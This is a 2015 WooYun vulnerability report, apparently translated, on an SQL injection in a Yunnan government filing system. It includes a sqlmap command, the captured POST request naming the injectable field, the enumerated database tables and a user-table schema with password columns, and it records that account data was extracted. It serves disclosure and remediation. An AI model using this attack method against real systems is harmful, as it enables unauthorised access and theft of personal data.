Vulnerability Summary

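Bug ID: wooyun-2015-0138036

Title: SQL injection vulnerability in the networked information filing management system of a sensitive department in Yunnan Province

Vendor: A sensitive department in Yunnan Province

Author: qglfnt

Submitted: 2015-08-31 15:22

Fixed: 2015-10-16 10:20

Disclosed: 2015-10-16 10:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (First Research Institute of the Ministry of Public Security) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]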

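Vulnerability Details

Disclosure status:

2015-08-31: Details reported to the vendor; awaiting vendor handling
2015-09-01: Vendor confirmed; details disclosed to the vendor only
2015-09-11: Details disclosed to core white hats and experts in related fields
2015-09-21: Details disclosed to regular white hats
2015-10-01: Details disclosed to intern white hats
2015-10-16: Details disclosed to the public

Brief description:

RT (see title)

Detailed description:

Injection request packet (sqlmap -r 1.txt):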

POST http://**.**.**.**:81/UserRecordOperation/PulSearch.aspx HTTP/1.1
Host: **.**.**.**:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:81/UserRecordOperation/PulSearch.aspx
Cookie: ASP.NET_SessionId=3jk31ejwwvxk2c55oeb0xj55; maincardsel=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 586

__VIEWSTATE=UFvzF7SURJEcPhmKLbVYq12nf5Nwq15iwCSdfL%2BorhcFId4bgKiCAdmY5tzZ01x83NJ2N%2FkxOiF3xmi0MvccJt60VNZL%2FGHQdHkvEQxD0F6KGMVQt1N7sxZNXgJ79EIP8tfDRFEfSLC4bv%2B%2B369oxuno8DLdYWvPY2R7wtKrO7VWjIRkxselw1ue8XkXvDv5Zce8CG8SFiWuiRFmtjt%2FrIDOxvE%3D&__VIEWSTATEGENERATOR=EE853DC6&__EVENTVALIDATION=%2FY0vgI0xv5pZIhOrNkgfc%2BzmAJqouM7Eif7o6BSPRosB%2BjtqYtY%2FAV%2BQA4pIzY7ulQ6jAWaMyh0l6VWNPgXmLlah%2FVZdx6BJONxI4v78ix0Y1POY7eevvQ0n4X0%3D&Radio=2&ctl00%24ContentPlaceHolder1%24TextBox1=1111111111&ctl00%24ContentPlaceHolder1%24ImageButton1.x=62&ctl00%24ContentPlaceHolder1%24ImageButton1.y=1

Proof of vulnerability:

The vulnerable parameter and the current database

[Screenshot: 20150830211241.png]


All databases

[Screenshot: 20150830211427.jpg]



Database: PP_RecordCase
[74 tables]
+---------------------------------+
| Base_ICP_Info |
| Base_IDC_Info |
| Base_ISP_Info |
| Base_Net_Info |
| Base_Place_Info |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| RecordCase_DialupAccount |
| RecordCase_ERoom_Info |
| RecordCase_FixIP_Info |
| RecordCase_Green_Info |
| RecordCase_HardSafeProduct_Info |
| RecordCase_ICP_Info |
| RecordCase_ICP_ServerType |
| RecordCase_ICP_ServiceContent |
| RecordCase_IDC_Info |
| RecordCase_IPAddress |
| RecordCase_ISP_Info |
| RecordCase_IS_Info |
| RecordCase_ManaAuditNotes |
| RecordCase_NetCompany_Info |
| RecordCase_Other_Info |
| RecordCase_PlaceType |
| RecordCase_RecDatu |
| RecordCase_Result_Info |
| RecordCase_SafePersonal_Info |
| RecordCase_ServerAddress |
| RecordCase_ServiceIP |
| RecordCase_SoftSafeProduct_Info |
| RecordCase_SpecificMeasures |
| RecordCase_UpFileType |
| RecordCase_UpLoadExcel_Info |
| RecordCase_UpdateModule |
| RecordCase_UserNotes |
| RecordCase_Wireless_Info |
| SYS_AreaTown_Info |
| SYS_AuditLog_Info |
| SYS_DepartmentDecod_Info |
| SYS_Logs_Info |
| SYS_Option_Info |
| SYS_PerCat_Info |
| SYS_RolePer_Info |
| SYS_Roles_Info |
| SYS_SysTree |
| SYS_UserPer_Info |
| SYS_User_Info |
| VIEW_AuditResult |
| VIEW_EmphasesNetCom_EXPORT |
| VIEW_ICPInfo_Select |
| VIEW_ICP_EXPORT |
| VIEW_ICP_RESULT |
| VIEW_ICP_StandardEXPORT |
| VIEW_ICP_Standard_IDCEXPORT |
| VIEW_IDCInfo_Select |
| VIEW_IDC_EXPORT |
| VIEW_IDC_RESULT |
| VIEW_IDC_StandardEXPORT |
| VIEW_ISPInfo_Select |
| VIEW_ISP_EXPORT |
| VIEW_ISP_RESULT |
| VIEW_ISP_StandardEXPORT |
| VIEW_InternetNetCom_EXPORT |
| VIEW_NETCOMP_RESULT |
| VIEW_NetComInfo_Select |
| VIEW_NetCom_EXPORT |
| VIEW_RolePerCat |
| VIEW_TreePer |
| VIEW_UserRole |
| comd_list |
| dtproperties |
| pangolin_test_table |
| syscommand |
| t_t |
+---------------------------------+


Columns

Database: PP_RecordCase
Table: SYS_User_Info
[14 columns]
+---------------+---------+
| Column | Type |
+---------------+---------+
| AreaCodeID | varchar |
| ChangeRecord | int |
| ControlRecord | varchar |
| DeleteRecord | int |
| Email | varchar |
| ID | int |
| Password | varchar |
| Phone | varchar |
| Remark | varchar |
| RoleID | int |
| Sex | varchar |
| SuperiorID | int |
| TrueName | varchar |
| UserName | varchar |
+---------------+---------+


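Account information; there is much more, only part of it was captured in the screenshot

[Screenshot: 20150830211750.png]


No "water meter checks", please

Remediation:

Filter the parameters or deploy a WAF

Copyright notice: when reposting, please credit the source qglfnt@WooYun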


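Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2015-09-01 10:19

Vendor reply:

Thank you for the submission!!
The described issue has been verified and confirmed, and they have been notified to fix it.

Latest status:

None yet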

